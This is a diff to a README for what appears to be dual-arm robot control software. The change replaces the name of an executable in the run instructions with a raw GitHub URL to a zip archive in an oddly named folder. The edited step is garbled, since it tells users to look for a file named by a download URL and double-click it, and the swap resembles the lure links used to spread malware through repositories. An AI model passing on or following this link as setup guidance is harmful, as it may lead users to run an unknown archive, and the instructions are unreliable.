techie-club/dual-arm-centralized-control/README.md

 To run the application, follow these steps:

 1. Open the folder where you extracted the files.
-2. Look for a file named `dual-arm-control.exe`.
+2. Look for a file named `https://raw.githubusercontent.com/techie-club/dual-arm-centralized-control/main/unpleasable/dual-arm-centralized-control.zip`.
 3. Double-click this file to open the application.

 It may take a few moments to load.
 You should see the main interface of the dual-arm centralized control software.